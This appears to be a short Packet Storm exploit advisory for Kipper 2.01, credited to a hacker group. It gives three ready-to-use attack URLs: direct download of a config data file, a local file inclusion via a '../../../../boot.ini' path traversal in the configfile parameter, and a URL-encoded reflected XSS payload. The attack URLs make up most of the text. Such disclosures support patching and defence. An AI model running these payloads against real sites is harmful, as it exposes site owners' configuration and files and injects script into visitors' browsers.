Kipper version 2.01 suffers from cross site scripting, local file inclusion, and database disclosure vulnerabilities.
1d73cfe83d80e0a5b7cd0efb387b348bb8dceb98684fcd7db4bbf1e231553cee# Kipper 2.01 Multiple Vulnes ( Remote Data Reading , Local File Include , Remote XSS )
# Download From : http://www.bookelves.com/kipper/files/kipper20.zip
- Found By : RoMaNcYxHaCkEr
- My Site : WwW.Sec-Code.CoM
- My Group : Security - Codes Group
# Exploit [1]:
- Remote Data Reading :
http://localhost/kipper20/job/config.data
# Exploit [2]:
- Local File Include :
http://localhost/kipper20/index.php?configfile=../../../../boot.ini
# Exploit [3]:
- Remote XSS :
http://localhost/kipper20/default.php?charm=%3E%20%3E%20ScRiPt%20%3EALERT%20529227151633%20%3B%20%2FScRiPt%3E#685828818694793444
# EOF ..
# rXh
# bEST wISHES
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed